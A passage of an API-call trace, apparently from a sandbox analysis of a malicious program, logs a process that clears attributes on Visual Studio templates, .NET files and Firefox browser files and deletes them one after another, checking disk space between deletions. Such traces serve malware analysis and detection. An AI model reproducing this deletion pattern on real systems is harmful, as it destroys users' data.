lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0128.467] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\XmlFile.zip", dwFileAttributes=0x80) returned 1 [0128.467] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\XmlFile.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\xmlfile.zip")) returned 1 [0128.470] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.470] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.470] CoTaskMemFree (pv=0x508980) [0128.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.470] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.470] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.470] CoTaskMemFree (pv=0x508980) [0128.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.474] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0128.478] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\AppConfigurationInternal.zip", dwFileAttributes=0x80) returned 1 [0128.478] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\AppConfigurationInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\appconfigurationinternal.zip")) returned 1 [0128.481] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0128.501] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\AssemblyInfoInternal.zip", dwFileAttributes=0x80) returned 1 [0128.501] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\AssemblyInfoInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\assemblyinfointernal.zip")) returned 1 [0128.504] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0128.508] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Class.zip", dwFileAttributes=0x80) returned 1 [0128.508] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Class.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\class.zip")) returned 1 [0128.511] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0128.515] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Dataset.zip", dwFileAttributes=0x80) returned 1 [0128.516] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Dataset.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\dataset.zip")) returned 1 [0128.518] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0128.523] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Dialog.zip", dwFileAttributes=0x80) returned 1 [0128.523] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Dialog.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\dialog.zip")) returned 1 [0128.526] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0128.531] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\EmptyDatabase.zip", dwFileAttributes=0x80) returned 1 [0128.532] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\EmptyDatabase.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\emptydatabase.zip")) returned 1 [0128.535] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0128.543] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Explorer.zip", dwFileAttributes=0x80) returned 1 [0128.543] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Explorer.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\explorer.zip")) returned 1 [0128.547] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0128.552] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Form.zip", dwFileAttributes=0x80) returned 1 [0128.552] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Form.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\form.zip")) returned 1 [0128.555] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0128.562] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\LoginForm.zip", dwFileAttributes=0x80) returned 1 [0128.563] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\LoginForm.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\loginform.zip")) returned 1 [0128.565] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0128.572] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\MDIParent.zip", dwFileAttributes=0x80) returned 1 [0128.572] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\MDIParent.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\mdiparent.zip")) returned 1 [0128.575] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0128.579] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Module.zip", dwFileAttributes=0x80) returned 1 [0128.580] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Module.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\module.zip")) returned 1 [0128.582] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0128.587] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\ResourceInternal.zip", dwFileAttributes=0x80) returned 1 [0128.587] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\ResourceInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\resourceinternal.zip")) returned 1 [0128.590] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0128.613] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\SettingsInternal.zip", dwFileAttributes=0x80) returned 1 [0128.614] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\SettingsInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\settingsinternal.zip")) returned 1 [0128.616] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0128.629] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\SplashScreen.zip", dwFileAttributes=0x80) returned 1 [0128.629] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\SplashScreen.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\splashscreen.zip")) returned 1 [0128.632] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0128.636] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Text.zip", dwFileAttributes=0x80) returned 1 [0128.637] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\Text.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\text.zip")) returned 1 [0128.639] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0128.668] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\UserControl.zip", dwFileAttributes=0x80) returned 1 [0128.669] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\UserControl.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\usercontrol.zip")) returned 1 [0128.672] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.672] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.672] CoTaskMemFree (pv=0x508980) [0128.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.672] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.672] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.673] CoTaskMemFree (pv=0x508980) [0128.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.673] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.673] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.673] CoTaskMemFree (pv=0x508980) [0128.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.674] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.674] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.674] CoTaskMemFree (pv=0x508980) [0128.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.674] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.674] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.674] CoTaskMemFree (pv=0x508980) [0128.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.675] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.675] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.675] CoTaskMemFree (pv=0x508980) [0128.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.676] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.676] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.676] CoTaskMemFree (pv=0x508980) [0128.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.677] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.677] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.677] CoTaskMemFree (pv=0x508980) [0128.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.698] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.698] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.698] CoTaskMemFree (pv=0x508980) [0128.698] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.725] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0128.737] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AssemblyList_4_client.xml", dwFileAttributes=0x80) returned 1 [0128.738] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AssemblyList_4_client.xml" (normalized: "c:\\program files (x86)\\microsoft.net\\redistlist\\assemblylist_4_client.xml")) returned 1 [0128.741] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0128.746] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AssemblyList_4_extended.xml", dwFileAttributes=0x80) returned 1 [0128.746] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AssemblyList_4_extended.xml" (normalized: "c:\\program files (x86)\\microsoft.net\\redistlist\\assemblylist_4_extended.xml")) returned 1 [0128.749] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.749] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.749] CoTaskMemFree (pv=0x508980) [0128.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.752] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.752] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.752] CoTaskMemFree (pv=0x508980) [0128.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.756] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0128.767] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\blocklist.xml", dwFileAttributes=0x80) returned 1 [0128.767] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\blocklist.xml" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\blocklist.xml")) returned 1 [0128.771] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0128.776] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\chrome.manifest", dwFileAttributes=0x80) returned 1 [0128.776] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\chrome.manifest" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\chrome.manifest")) returned 1 [0128.779] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.779] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.779] CoTaskMemFree (pv=0x508980) [0128.779] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.780] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0128.787] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\components\\components.manifest", dwFileAttributes=0x80) returned 1 [0128.787] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\components\\components.manifest" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\components\\components.manifest")) returned 1 [0128.789] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.789] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.790] CoTaskMemFree (pv=0x508980) [0128.790] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.791] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.791] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.791] CoTaskMemFree (pv=0x508980) [0128.791] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.793] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0128.800] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\icon.png", dwFileAttributes=0x80) returned 1 [0128.801] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\icon.png" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\icon.png")) returned 1 [0128.803] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.803] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.803] CoTaskMemFree (pv=0x508980) [0128.803] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.806] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0128.811] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\amazondotcom.xml", dwFileAttributes=0x80) returned 1 [0128.811] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\searchplugins\\amazondotcom.xml" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\searchplugins\\amazondotcom.xml")) returned 1 [0128.814] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0128.819] SetFileAttributesW 